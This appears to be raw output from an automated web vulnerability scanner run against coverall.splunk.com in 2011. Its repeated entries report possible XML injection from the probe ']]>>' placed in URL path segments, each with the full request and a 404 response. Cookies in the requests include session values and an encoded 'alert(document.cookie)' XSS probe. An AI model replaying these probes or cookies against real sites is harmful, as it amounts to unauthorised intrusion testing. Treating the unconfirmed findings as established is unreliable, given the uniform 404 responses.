The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes/splunk_com/scripts/js/contrib]]>>/Myriad_Pro_Regular_400.font.js HTTP/1.1
Host: coverall.splunk.com
Proxy-Connection: keep-alive
Referer: http://www.splunk.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 05 Feb 2011 22:50:37 GMT
Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes/splunk_com/scripts/js/contrib/Myriad_Pro_Regular_400.font.js]]>> HTTP/1.1
Host: coverall.splunk.com
Proxy-Connection: keep-alive
Referer: http://www.splunk.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 05 Feb 2011 22:50:39 GMT
Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes]]>>/splunk_com/scripts/js/contrib/Myriad_Pro_Semibold_600.font.js HTTP/1.1
Host: coverall.splunk.com
Proxy-Connection: keep-alive
Referer: http://www.splunk.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 05 Feb 2011 22:50:27 GMT
Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes/splunk_com]]>>/scripts/js/contrib/Myriad_Pro_Semibold_600.font.js HTTP/1.1
Host: coverall.splunk.com
Proxy-Connection: keep-alive
Referer: http://www.splunk.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 05 Feb 2011 22:50:29 GMT
Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes/splunk_com/scripts]]>>/js/contrib/Myriad_Pro_Semibold_600.font.js HTTP/1.1
Host: coverall.splunk.com
Proxy-Connection: keep-alive
Referer: http://www.splunk.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 05 Feb 2011 22:50:31 GMT
Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes/splunk_com/scripts/js]]>>/contrib/Myriad_Pro_Semibold_600.font.js HTTP/1.1
Host: coverall.splunk.com
Proxy-Connection: keep-alive
Referer: http://www.splunk.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 05 Feb 2011 22:50:33 GMT
Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes/splunk_com/scripts/js/contrib]]>>/Myriad_Pro_Semibold_600.font.js HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:36 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes/splunk_com/scripts/js/contrib/Myriad_Pro_Semibold_600.font.js]]>> HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:37 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets]]>>/v5/homepage HTTP/1.1 Host: coverall.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942985.2.2.utmcsr=splunkbase.splunk.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942985.2; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942985; __kts=1296942984820,http%3A%2F%2Fwww.splunk.com%2F,http%3A%2F%2Fsplunkbase.splunk.com%2F%3F1ffc5%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E46cc332d1dc%3D1; __ktt=e7f-7c3a-23d7-b39612df7d36e75;
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Connection: close Date: Sat, 05 Feb 2011 22:48:14 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets/v5]]>>/homepage HTTP/1.1 Host: coverall.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942985.2.2.utmcsr=splunkbase.splunk.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942985.2; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942985; __kts=1296942984820,http%3A%2F%2Fwww.splunk.com%2F,http%3A%2F%2Fsplunkbase.splunk.com%2F%3F1ffc5%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E46cc332d1dc%3D1; __ktt=e7f-7c3a-23d7-b39612df7d36e75;
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Connection: close Date: Sat, 05 Feb 2011 22:48:17 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets/v5/homepage]]>> HTTP/1.1 Host: coverall.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942985.2.2.utmcsr=splunkbase.splunk.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942985.2; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942985; __kts=1296942984820,http%3A%2F%2Fwww.splunk.com%2F,http%3A%2F%2Fsplunkbase.splunk.com%2F%3F1ffc5%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E46cc332d1dc%3D1; __ktt=e7f-7c3a-23d7-b39612df7d36e75;
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:48:19 GMT Server: lighttpd/1.4.18
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets]]>>/v5/homepage/homepage.hero.css HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:00 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets/v5]]>>/homepage/homepage.hero.css HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:02 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets/v5/homepage]]>>/homepage.hero.css HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:05 GMT Server: lighttpd/1.4.18
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets/v5/homepage/homepage.hero.css]]>> HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:07 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
